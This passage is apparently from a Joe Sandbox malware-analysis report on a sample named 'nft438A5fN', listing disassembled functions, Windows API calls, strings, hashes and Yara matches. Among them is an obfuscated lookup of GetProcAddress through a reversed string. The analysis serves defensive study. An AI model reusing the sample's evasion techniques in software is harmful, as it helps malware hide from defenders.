                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D28495
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D284B3
                                                                      • __Init_thread_footer.LIBCMT ref: 02D284F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                      • String ID: ,kG$0kG$@!G
                                                                      • API String ID: 3815856325-312998898
                                                                      • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                                      • Instruction ID: 38e272c1458405e5393350c4a40c6baa62ae4dfecdb5f5daca0d42cd7fb65e7e
                                                                      • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                                      • Instruction Fuzzy Hash: A721F232900530ABCB14AB68D84099D77AADF55724F21416AE819E7390DF31AE49CFB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                      • Instruction ID: 6d1a4591bd08889c20d1c1f0e94a4c4af412a1e7020937e5bf865b144576973b
                                                                      • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                      • Instruction Fuzzy Hash: 36115076500218BFCF01EF54C941E993FA6FF05350F9184A6BE488B621EBB2DE509FA0
                                                                      Strings
                                                                      • bytes: , xrefs: 02C9275D
                                                                      • , xrefs: 02C92814
                                                                      • 7, xrefs: 02C926A1
                                                                      • An unexpected memory leak has occurred. , xrefs: 02C92690
                                                                      • Unexpected Memory Leak, xrefs: 02C928C0
                                                                      • The unexpected small block leaks are:, xrefs: 02C92707
                                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C92849
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                      • API String ID: 0-2723507874
                                                                      • Opcode ID: 6c85c02ba1ac1415b11bc3eedcf8d7daf0b146463e5afa62214ce6b63db2d0d9
                                                                      • Instruction ID: aa600cfaed749194127797e7c3aa70c96f4c4e22c1866249c61de0bfc4f26340
                                                                      • Opcode Fuzzy Hash: 6c85c02ba1ac1415b11bc3eedcf8d7daf0b146463e5afa62214ce6b63db2d0d9
                                                                      • Instruction Fuzzy Hash: FD71C330A04298AFDF219B2CCC88BD9BAE5EF49700F1440E5D989E7281DB758AC5CF52
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_abort_memcmp
                                                                      • String ID: C
                                                                      • API String ID: 137591632-1037565863
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 6$8+G$8+G$xdF
                                                                      • API String ID: 176396367-2796295669
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(00000000,02C9C08B,?,?,00000000,00000000), ref: 02C9BDF6
                                                                        • Part of subcall function 02C9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locale$InfoThread
                                                                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                      • API String ID: 4232894706-2493093252
                                                                      APIs
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAB000
                                                                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02CAB017
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAB0AB
                                                                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 02CAB0B7
                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02CAB0CB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Read$HandleModule
                                                                      • String ID: KernelBase$LoadLibraryExA
                                                                      • API String ID: 2226866862-113032527
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?,02D167C8,?,?,02CBE7A8,02C965B1,02CBD30D), ref: 02C94395
                                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?,02D167C8,?,?,02CBE7A8,02C965B1,02CBD30D), ref: 02C9439B
                                                                      • GetStdHandle.KERNEL32(000000F5,02C943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?,02D167C8), ref: 02C943B0
                                                                      • WriteFile.KERNEL32(00000000,000000F5,02C943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C94423,?,?), ref: 02C943B6
                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C943D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleWrite$Message
                                                                      • String ID: Error$Runtime error at 00000000
                                                                      • API String ID: 1570097196-2970929446
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D2873B
                                                                      • int.LIBCPMT ref: 02D2874E
                                                                        • Part of subcall function 02D2568C: std::_Lockit::_Lockit.LIBCPMT ref: 02D2569D
                                                                        • Part of subcall function 02D2568C: std::_Lockit::~_Lockit.LIBCPMT ref: 02D256B7
                                                                      • std::_Facet_Register.LIBCPMT ref: 02D2878E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D28797
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D287B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                      • String ID: (mG
                                                                      • API String ID: 2536120697-4059303827
                                                                      APIs
                                                                        • Part of subcall function 02C9AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9AD59
                                                                        • Part of subcall function 02C9AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9AD7D
                                                                        • Part of subcall function 02C9AD3C: GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD98
                                                                        • Part of subcall function 02C9AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9AE2E
                                                                      • CharToOemA.USER32(?,?), ref: 02C9AEFB
                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF18
                                                                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF1E
                                                                      • GetStdHandle.KERNEL32(000000F4,02C9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF33
                                                                      • WriteFile.KERNEL32(00000000,000000F4,02C9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AF39
                                                                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C9AF5B
                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C9AF71
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                      • String ID:
                                                                      • API String ID: 185507032-0
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 02D52279
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D52295
                                                                      • __allrem.LIBCMT ref: 02D522AC
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D522CA
                                                                      • __allrem.LIBCMT ref: 02D522E1
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D522FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
                                                                      • Instruction ID: 98611ed97f72408b88f77400e422d72d6f48380bf0bf285dbc1ab658a8c5a744
                                                                      • Opcode Fuzzy Hash: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
                                                                      • Instruction Fuzzy Hash: 05517077504231ABDF24AF68D840BBAB7A5DF46354F24425AFD459B380EBB19D01C770
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe
                                                                      • String ID:
                                                                      • API String ID: 4189289331-0
                                                                      • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                      • Instruction ID: cb6eec04f7e851df96c081e57dc14d7b70cc5e33e0e62525ad0ae92b819f02ef
                                                                      • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                      • Instruction Fuzzy Hash: 0A51F772905325ABDF20AB6C8C41FAE77AADF49324F20421AEC19D63C1DBB1DD41CA74
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C9E625
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C9E641
                                                                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C9E67A
                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C9E6F7
                                                                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C9E710
                                                                      • VariantCopy.OLEAUT32(?,00000000), ref: 02C9E745
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                      • String ID:
                                                                      • API String ID: 351091851-0
                                                                      • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                      • Instruction ID: 1fb1f776cdab45c163e600218b4b38f5882dbd94568abb80a14a164b596ef220
                                                                      • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                      • Instruction Fuzzy Hash: 5F511A7590162D9BCF22EF58CC88BD9B3BDAF58300F0041D6E609E7201DA30AF819FA1
                                                                      APIs
                                                                        • Part of subcall function 02D4BD91: __onexit.LIBCMT ref: 02D4BD97
                                                                      • __Init_thread_footer.LIBCMT ref: 02D18E4E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Init_thread_footer__onexit
                                                                      • String ID: PkG$XMG$NG$NG
                                                                      • API String ID: 1881088180-3151166067
                                                                      • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                      • Instruction ID: baf45747f6863521c29a03938615187fac8e654752a9323ba2c20d5912a2dbd2
                                                                      • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                      • Instruction Fuzzy Hash: 2A4193315042506BD324EB24F8A4AEE73ABEB85310F50452AE54A967E0DF305D4ACF2A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                      • Instruction ID: f4b3bb21abca6d0a5aaf3ecd5d92e01df63d111c254a86b56921cab00b633d8c
                                                                      • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                      • Instruction Fuzzy Hash: 4D41FA71900714EFDB249F78CD50BAABBE9EB88710F10856AE955DB380D7B59D018BD0
                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C935BA
                                                                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C935ED
                                                                      • RegCloseKey.ADVAPI32(?,02C93610,00000000,?,00000004,00000000,02C93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C93603
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                      • API String ID: 3677997916-4173385793
                                                                      • Opcode ID: fb50d0b5ff686b76f7fc6850958b100a27809e33336bb07ceb666b85cb4ff86f
                                                                      • Instruction ID: d88b4d7f1c526ea8c01c03c4dd263e372a393f9a37437419856c1b5b68710c6c
                                                                      • Opcode Fuzzy Hash: fb50d0b5ff686b76f7fc6850958b100a27809e33336bb07ceb666b85cb4ff86f
                                                                      • Instruction Fuzzy Hash: 1B01B575944698BAEF11DBD09D06BBD77ECE708B00F5005A1BA04D7680E7B4A610DA59
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                      • API String ID: 667068680-1372893251
                                                                      • Opcode ID: 8cd103a011c5d1248d703ae1422ab44abc6590a2708e93efcdc11d423b94d26b
                                                                      • Instruction ID: 369e1f8d0909a81dc5b9b64a50ff3743e75560e0b09a5c0668529f8807392938
                                                                      • Opcode Fuzzy Hash: 8cd103a011c5d1248d703ae1422ab44abc6590a2708e93efcdc11d423b94d26b
                                                                      • Instruction Fuzzy Hash: 68014BB5680309BFEB14EBA4EC55E9EB7EEFB48B04F514460B805D7B50DA70AE01DA24
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                      • Instruction ID: 39fb2e88978957efa40f6490c34661459651a09ef52a0351281f530e318d10e8
                                                                      • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                      • Instruction Fuzzy Hash: 2951CD31A10728ABDF209F69C881B6A77F5EF49724F10456AEC4AD7350E7B5ED40CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                      • Instruction ID: caeddcab40c36478fe8401a7cb1a01fa6ad3c9ea82122897e42449cdeae45e08
